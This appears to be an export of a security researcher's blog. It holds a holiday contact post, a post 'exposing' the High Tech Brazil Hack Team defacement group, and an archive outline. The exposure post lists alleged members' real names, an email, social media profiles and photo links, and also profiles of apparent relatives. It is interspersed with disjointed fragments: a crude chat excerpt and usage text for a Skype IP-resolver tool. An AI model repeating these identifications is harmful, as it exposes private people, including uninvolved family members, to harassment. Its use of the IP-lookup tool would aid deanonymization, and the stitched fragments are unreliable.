10. https://unit-123.org/wp-content/uploads/2019/12/viber.txt

11. https://unit-123.org/wp-content/uploads/2019/12/vk.txt

12. https://unit-123.org/wp-content/uploads/2019/12/xmpp.txt

13. https://unit-123.org/wp-content/uploads/2019/12/Misc 01.txt

14. https://unit-123.org/wp-content/uploads/2019/12/Misc 02.txt

15. https://ddanchev.blogspot.com/2019/10/announcing-law-enforcement-and-osint.html
Happy Holidays! (2019-12-23 20:08)

Dear blog readers, 

It's been a pleasure and an honor to serve your needs since December, 2005 when I officially opened this blog while working as a Managing Director for Astalavista.com - The Underground, and I sincerely hope that you'll continue to find my research informative and of sufficient quality to recommend my personal blog to friends and colleagues, and to possibly approach me for additional information regarding a particular blog post or to actually send a "say hi" or "keep up the good fight" type of message.

My 2020 primary contact points include:

Personal Email - ddanchev@cryptogroup.net

Social Media Accounts - [1]Twitter, [2]LinkedIn, [3]Facebook, [4]Angellist, [5]YouTube, [6]Medium

IM and Skype ID: [7]dancho_danchev_

Web properties that I'm currently running include - [8]Offensive Warfare 2.0 and [9]Unit-123.org

XMPP/OMEMO ID for Real-Time Conversation: 90184@armadillophone.com which is basically compatible with [10]ChatSecure, [11]Conversations and [12]Dino - feel free to install any of these applications in case you're not using them already and feel free to "say hi".

Happy holidays and thanks a lot to everyone who's been keeping in touch and keeping up the good fight!

Stay tuned! 

1. https://twitter.com/dancho_danchev

2. https://linkedin.com/in/danchodanchev

3. https://www.facebook.com/dancho.danchev.1048

4. https://angel.co/dancho-danchev

5. https://www.youtube.com/channel/UC-kG5HI0iravFMfukwEPKfw

6. https://medium.com/@danchodanchev/

7. https://join.skype.com/invite/cf5 a mBfNdeYb

8. https://forums.offensive-warfare.com/

9. https://unit-123.org/

10. https://chatsecure.org/

11. https://conversations.im/

12. https://dino.im/

Hacked by HighTech Brazil HackTeam
No\One - CrazyDuck - Otrasher - L34NDR0

Exposing High Tech Brazil Hack Team Mass Web Site Defacement Group - An OSINT Analysis (2019-12-27 15:38)

It's been a while since I last posted a quality update detailing the inner workings of a high-profile and prominent Web site defacement group that has managed to successfully compromise thousands of Web sites internationally, including the Web site of Bulgaria's National Security Agency (DANS) - hxxp://dans.org.

In this post I'll provide actionable intelligence, including personally identifiable information, on the people and the gang behind the campaign, along with an in-depth analysis of their tactics, techniques and procedures, and the personal photos and social media accounts of the infamous High Tech Brazil Hack Team, which is responsible for having successfully defaced over 5,000 legitimate Web sites internationally.

Team Members Include:

- crazyduck - Real Name: Fabian de Souza Peralazzo

- otrasher - Email: Otrasher@live.com - Social Media Account - https://twitter.com/bltchx_

- I34NDR0

- wicked

- live

- Smoker

Sample Photos of High Tech Brazil Hack Team Team Members:
[22:00:43] (CrazyDuck) I don't know if you do it
[22:00:45] (CrazyDuck) But like
[22:00:49] (CrazyDuck) Wipe, take the paper
[22:00:52] (CrazyDuck) And give it a little sniff
[22:00:54] (CrazyDuck) Never done that?

[22:01:04] (SynchrONize) no
[22:01:08] (SynchrONize) I just look
[22:01:11] (SynchrONize) to see if it's clean already
[22:01:14] (SynchrONize) sniffing is way too gross
[22:01:15] (SynchrONize) hahahaha

[22:01:21] (CrazyDuck) There was a time when I was nastier

[22:01:25] (CrazyDuck) Before flushing

[22:01:32] (CrazyDuck) I'd put my nose almost inside the toilet
HELPS
GET IP:
skype-resolver.pl --help
skype-resolver.pl --getip <username>
skype-resolver.pl --credits
Twitter Social Media Accounts known to have participated in the campaign:

https://twitter.com/xFellipeCT
https://twitter.com/Kouback_TR_
https://twitter.com/bltchx_
https://twitter.com/synchrOnlze
https://twitter.com/aceeeeeeeer
https://twitter.com/HADESUnsekurity
https://twitter.com/slayer_owner
https://twitter.com/Whiskpentest
https://twitter.com/LulzSecRoot
https://twitter.com/unknown_br
https://twitter.com/Atena_Unknown
https://twitter.com/MandrivaL

Personally Identifiable Information on High Tech Brazil Hack Team Team Members:

• synchronize 

Real Name: Bruno Maglia 

Facebook Account Profile: 

https://www.facebook.com/brunoa qnp ; 
https://www.facebook.com/brunao.maglia 

Related Facebook Account Profiles:

https://www.facebook.com/paulasouzzaa; 

https://www.facebook.com/francine.maglia 

https://www.facebook.com/caio.favaratogalvao 

https://www.facebook.com/kel i .favarato - 
https://www.facebook.com/fabiano.galvao.18 

• aceeeeeeeer 
Real Name: Gustavo Gemen

Personal Photos:

http://imgur.com/zdRoh33 

http://i mg ur.com/mQfN8jk,49aNcs6,dCQYCgc,XPtKSAB 
; 

http://imgur.com/eKWbZDnJ0iHr7 A, HKu5Jw8; 
http://imgur.com/eKWbZDnJ0iHr7 A,HKu5Jw8 



Facebook Account Profile: 

https://facebook.com/gustavo.gemen 

Related photos: 

http://imgur.com/hZDJSNb,PXjcBsR 
http://i mg ur.com/V6Yu I Bs,B6CgXKo 
http://imgur.com/8wmqbGg,ZKUjMlQ,vKECfQf 
http://imgur.com/GTIiRul,GLtvlZI,vfyAhuu 

Related URLs: 

https://www.youtube.com/channel/UCBgeuuT9sdFOOkFoGntlp6w

https://koubacktr.wordpress.com/ 

I'll soon be posting an additional set of details on the High Tech Brazil Hack Team and I'll definitely be looking forward to sharing the necessary details with the Security Industry and Law Enforcement in an attempt to track down and prosecute the individuals behind these campaigns.

Stay tuned! 
Document Outline

• 2018
o July
■ Historical OSINT - Summarizing 2 Years of Webroot's Threat Blog Posts Research (2018-07-28 21:00)
o September
■ Introducing Threat Data - The World's Most Comprehensive Threats Database (2018-09-20 16:30)
o October
■ Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected (2018-10-19 18:17)
■ Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits (2018-10-19 22:46)
■ Historical OSINT - A Diverse Portfolio of Fake Security Software (2018-10-20 20:22)
■ Historical OSINT - Calling Zeus Home (2018-10-20 20:25)
■ Historical OSINT - Chinese Government Sites Serving Malware (2018-10-20 20:28)
■ Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware (2018-10-20 20:29)
■ Historical OSINT - PhishTube Twitter Broadcast Impersonated Scareware Serving Twitter Accounts Circulating (2018-10-20 22:10)
■ Historical OSINT - Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild (2018-10-20 22:28)
■ Historical OSINT - Latvian ISPs, Scareware, and the Koobface Gang Connection (2018-10-20 22:34)
■ Historical OSINT - Massive Scareware Dropping Campaign Spotted in the Wild (2018-10-20 22:38)
■ Historical OSINT - Malware Domains Impersonating Google (2018-10-20 22:51)
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 22:35)
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild - Part Two (2018-10-21 22:47)
■ Historical OSINT - Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang (2018-10-21 23:02)
■ Historical OSINT - Profiling a Portfolio of Active 419-Themed Scams (2018-10-21 23:08)
■ Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 23:21)
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:37)
■ Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:47)
■ Historical OSINT - Spamvertized Swine Flu Domains - Part Two (2018-10-21 23:50)
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:55)
■ Historical OSINT - A Diversified Portfolio of Fake Security Software (2018-10-22 13:33)
■ Historical OSINT - A Diversified Portfolio of Fake Security Software Spotted in the Wild (2018-10-22 13:40)
■ Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware (2018-10-22 14:05)
■ Historical OSINT - Malicious Economies of Scale - The Emergence of Efficient Platforms for Exploitation - 2007 (2018-10-22 16:23)
■ Pay-Per-Exploit Acquisition Vulnerability Programs - Pros and cons? (2018-10-22 17:47)
o December
■ Cyber Security Project Investment Proposal - DIA Needipedia - Fight Cybercrime and Cyber Jihad With Sensors - Grab Your Copy Today! (2018-12-16 13:52)

• 2019
o January
■ Who's Behind BakaSoftware? - OSINT Analysis (2019-01-15 18:32)
■ Exposing Iran's Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis (2019-01-16 11:09)
■ Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis (2019-01-16 16:03)
■ The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter to the U.S Intelligence Community (2019-01-24 19:25)
o February
■ Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel LLC" Scam Domain Portfolio Spotted in the Wild (2019-02-07 10:14)
■ Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam Spotted in the Wild (2019-02-07 10:51)
■ Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruitment Scam Spotted in the Wild (2019-02-07 12:14)
■ Historical OSINT - Profiling a Typosquatted Facebook and Twitter Impersonating Fraudulent and Malicious Domains Portfolio (2019-02-07 15:47)
■ Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated Software (2019-02-07 17:27)
■ Historical OSINT - A Peek Inside The Georgia Government's Web Site Compromise Malware Serving Campaign - 2010 (2019-02-07 17:30)
■ Historical OSINT - Profiling a Portfolio of Fake Visa Application Scam Domains (2019-02-07 17:56)
■ Historical OSINT - Sub7 Crew Releases New Version on 11th Anniversary of The RAT (2019-02-07 18:03)
■ Historical OSINT - "I Know Who DDoS-ed Georgia and Bobbear.co.uk Last Summer" (2019-02-07 20:30)
o March
■ Announcing Offensive Warfare 2.0 - Official Hacking and Security Community Launch (2019-03-22 15:14)
o April
■ Dancho Danchev's 2010 Disappearance - An Elaboration - Part Two (2019-04-04 05:51)
■ Introducing Unit-123.org - Cyber Threat Intelligence Portal (2019-04-12 21:41)
■ Flashpoint Intel Official Web Site Serving Malware - An Analysis (2019-04-22 08:32)
o May
■ Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online Infrastructure (2019-05-04 19:45)
■ Historical OSINT - Profiling the Loads.cc Enterprise (2019-05-04 22:27)
■ Historical OSINT - Massive Scareware Serving Campaign Spotted in the Wild (2019-05-04 22:41)
■ Historical OSINT - Yet Another Massive Scareware Serving Campaign Courtesy of the Koobface Gang (2019-05-05 16:47)
■ Historical OSINT - Yet Another Massive Scareware-Serving Campaign Courtesy of the Koobface Gang (2019-05-05 17:19)
■ Offensive Warfare 2.0 - The Future of Cyber Warfare - Hacking and Cyber Security Community - Public Registration Now Open! (2019-05-15 10:33)
■ Proprietary Threat Intelligence Reports Available On Demand - Request a Copy Today! (2019-05-28 20:46)
■ Proprietary Cybercrime and Dark Web Forum Search Engine - BETA Access Available! (2019-05-28 20:48)
■ Dancho Danchev's Blog - Public Comments Now Open! (2019-05-29 08:38)
■ Dancho Danchev's Blog - Audio Version Available - Listen to Every Post! (2019-05-30 16:15)
■ Upcoming Security Project - Accepting Donations and Feedback! (2019-05-30 17:11)
o July
■ Upcoming Offensive Warfare 2.0 Cyber Security and Hacking Community YouTube Livestream Broadcast - RSVP Today! (2019-07-02 11:17)
■ Exposing Bulgaria's Largest Data Leak - An OSINT Analysis (2019-07-27 10:46)
■ Who's Behind the Syrian Electronic Army? - An OSINT Analysis (2019-07-28 18:19)
■ Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and XMPP Accounts (2019-07-29 17:05)
■ Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - An OSINT Analysis (2019-07-29 17:18)
■ Profiling "Innovative Marketing" - The Flagship Malvertising and Scareware Distributor - Circa 2008 - An OSINT Analysis (2019-07-30 14:50)
o August
■ Assessing the Recently Leaked FSB Contractor Data - A Peek Inside Russia's Understanding of Social Network Analysis and Tailored Access Operations (2019-08-02 15:20)
■ Got Bitcoin? (2019-08-19 12:51)
o September
■ DDanchev is for Hire! (2019-09-07 14:38)
■ Historical OSINT - The Russian Business Network Says "Hi" (2019-09-09 15:27)
■ Join Me on Patreon Community! (2019-09-09 18:07)
■ Fake NordVPN Web Site Drops Banking Malware Spotted in the Wild (2019-09-11 16:53)
■ Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet (2019-09-11 19:07)
■ I'm Back! (2019-09-17 09:56)
■ Massive Portfolio of APT (Advanced Persistent Threat) and RAT (Remote Access Tools) Domains Spotted in the Wild - An Analysis (2019-09-20 17:17)
■ Historical OSINT - Dancho Danchev's Media and News Coverage - 2008-2013 (2019-09-20 17:25)
o October
■ Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today! (2019-10-16 20:16)
o November
■ New Commercial Security Research OSINT Cybercrime Research and Threat Intelligence Gathering Services Portfolio Available On Demand! (2019-11-02 18:14)
o December
■ New Cybertronics - VR for Hackers and Security Experts Dark Web Onion Address (2019-12-02 10:15)
■ Official World Hacker Global Domination Group (WHGDG) Dark Web Onion Launch! (2019-12-02 10:16)
■ Dancho Danchev's Twitter Account - 2010 - Direct Download Link - Historical OSINT (2019-12-02 10:19)
■ Join me on Medium! (2019-12-02 10:59)
■ Got Bitcoin? - Part Two (2019-12-04 18:15)
■ Announcing New Hacking Security and Hacktivism-Themed Online Forum Community! Join me Today! (2019-12-12 19:00)
■ Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today! - Part Two (2019-12-12 19:12)
■ Happy Holidays! (2019-12-23 20:08)
■ Exposing High Tech Brazil Hack Team Mass Web Site Defacement Group - An OSINT Analysis (2019-12-27 15:38)